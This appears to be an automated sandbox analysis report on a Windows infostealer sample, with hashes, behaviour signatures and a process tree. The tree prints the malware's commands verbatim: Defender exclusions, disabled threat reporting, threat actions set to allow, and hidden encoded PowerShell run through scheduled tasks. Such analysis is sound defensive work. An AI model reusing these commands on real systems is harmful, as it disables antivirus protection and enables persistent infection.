Overview

overview

10

Static

static

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    134s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2023 10:59

Sharing

Copy URL
Twitter E-mail

General

  • Target

    file.exe

  • Size

    7MB

  • MD5

    38a593f57b168d0c9a0b659a77243d12

  • SHA1

    a3c10181d35c747687d15d023277a1f3a40d5815

  • SHA256

    7d87031a25997b0f8104509b6fbc0efe5bff9d51e525297ffe92a4f9688d6ab8

  • SHA512

    14aa028b21afcdb569753cf8995c6e8c51f8d8977a7a4389042d1762d00e1b0cfdda682b132dbf69cd165554d5f80950daee21b58598d627fe57c833f297027b

  • SSDEEP

    196608:91OJC2/ztd+v19I/FKV9bv+DUPp+XOwTHS0hdCjHE6u:3OJfLtdaGKXJPp++wDRhQc

Score
8/10
discoveryspywarestealer

Malware Config

Signatures

  • Blocklisted process makes network request ⋅ 1 IoCs
  • Executes dropped EXE ⋅ 4 IoCs
  • Checks BIOS information in registry ⋅ 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings ⋅ 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL ⋅ 1 IoCs
  • Reads user/profile data of web browsers ⋅ 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system ⋅ 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops Chrome extension ⋅ 1 IoCs
  • Drops desktop.ini file(s) ⋅ 1 IoCs
  • Drops file in System32 directory ⋅ 27 IoCs
  • Drops file in Program Files directory ⋅ 14 IoCs
  • Drops file in Windows directory ⋅ 4 IoCs
  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) ⋅ 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry ⋅ 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS ⋅ 64 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 44 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 4 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    Suspicious use of WriteProcessMemory
    PID:3208
    • C:\Users\Admin\AppData\Local\Temp\7zS74B8.tmp\Install.exe
      .\Install.exe
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:856
      • C:\Users\Admin\AppData\Local\Temp\7zS7777.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        Executes dropped EXE
        Checks BIOS information in registry
        Checks computer location settings
        Drops file in System32 directory
        Enumerates system info in registry
        Suspicious use of WriteProcessMemory
        PID:3392
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          Suspicious use of WriteProcessMemory
          PID:4904
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            Suspicious use of WriteProcessMemory
            PID:2148
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              PID:4724
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              PID:608
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          Suspicious use of WriteProcessMemory
          PID:4716
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            Suspicious use of WriteProcessMemory
            PID:3532
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              PID:4732
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
              PID:1356
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "gskktOmwd" /SC once /ST 01:08:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          Creates scheduled task(s)
          PID:944
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "gskktOmwd"
          PID:4324
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gskktOmwd"
          PID:5064
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bLqLKLLaYUqLtSzfKw" /SC once /ST 12:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\AklpEYo.exe\" Pi /site_id 525403 /S" /V1 /F
          Drops file in Windows directory
          Creates scheduled task(s)
          PID:2992
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    PID:4392
    • C:\Windows\system32\gpupdate.exe
      "C:\Windows\system32\gpupdate.exe" /force
      PID:5076
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
    PID:2572
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
    PID:2644
  • C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam
    PID:460
  • C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\AklpEYo.exe
    C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\AklpEYo.exe Pi /site_id 525403 /S
    Executes dropped EXE
    Drops file in System32 directory
    Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3212
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
          PID:1052
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
        PID:1444
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
        PID:1532
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
        PID:2232
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
        PID:1320
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
        PID:4968
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
        PID:544
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
        PID:1932
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
        PID:4052
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
        PID:4176
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
        PID:3560
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
        PID:1216
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
        PID:5056
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
        PID:4976
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
        PID:5028
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
        PID:1540
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
        PID:2148
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
        PID:4684
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
        PID:3928
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
        PID:5100
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
        PID:4856
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
        PID:1440
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
        PID:1192
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
        PID:4528
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FsFQcVpRNSNUC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FsFQcVpRNSNUC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ftljgLlqPYjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ftljgLlqPYjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gtYbQvtxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gtYbQvtxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mpIiGdOCcMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mpIiGdOCcMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jxOPGMlVxWbacrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jxOPGMlVxWbacrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\THZROCWpyYwmtzQt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\THZROCWpyYwmtzQt\" /t REG_DWORD /d 0 /reg:64;"
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:220
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:32
        PID:776
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:32
          PID:4372
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:64
        PID:2408
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsFQcVpRNSNUC" /t REG_DWORD /d 0 /reg:32
        PID:3036
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsFQcVpRNSNUC" /t REG_DWORD /d 0 /reg:64
        PID:3352
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ftljgLlqPYjU2" /t REG_DWORD /d 0 /reg:32
        PID:4756
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ftljgLlqPYjU2" /t REG_DWORD /d 0 /reg:64
        PID:1096
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtYbQvtxU" /t REG_DWORD /d 0 /reg:32
        PID:1132
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtYbQvtxU" /t REG_DWORD /d 0 /reg:64
        PID:5024
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpIiGdOCcMUn" /t REG_DWORD /d 0 /reg:32
        PID:3728
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpIiGdOCcMUn" /t REG_DWORD /d 0 /reg:64
        PID:3544
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\jxOPGMlVxWbacrVB /t REG_DWORD /d 0 /reg:32
        PID:2252
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\jxOPGMlVxWbacrVB /t REG_DWORD /d 0 /reg:64
        PID:2256
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD /t REG_DWORD /d 0 /reg:32
        PID:4632
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD /t REG_DWORD /d 0 /reg:64
        PID:3488
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\THZROCWpyYwmtzQt /t REG_DWORD /d 0 /reg:32
        PID:4972
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\THZROCWpyYwmtzQt /t REG_DWORD /d 0 /reg:64
        PID:4164
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gkyVDvpjj" /SC once /ST 07:58:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      Creates scheduled task(s)
      PID:2732
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gkyVDvpjj"
      PID:332
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gkyVDvpjj"
      PID:4084
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "RVtwMREJXQsvxhCBJ" /SC once /ST 06:15:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\arOmmdb.exe\" VC /site_id 525403 /S" /V1 /F
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:2252
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "RVtwMREJXQsvxhCBJ"
      PID:1828
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    PID:3468
    • C:\Windows\system32\gpupdate.exe
      "C:\Windows\system32\gpupdate.exe" /force
      PID:4284
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
    PID:4880
  • C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam
    PID:3532
  • C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\arOmmdb.exe
    C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\arOmmdb.exe VC /site_id 525403 /S
    Executes dropped EXE
    Checks computer location settings
    Drops Chrome extension
    Drops desktop.ini file(s)
    Drops file in System32 directory
    Drops file in Program Files directory
    Modifies data under HKEY_USERS
    Suspicious behavior: EnumeratesProcesses
    PID:4164
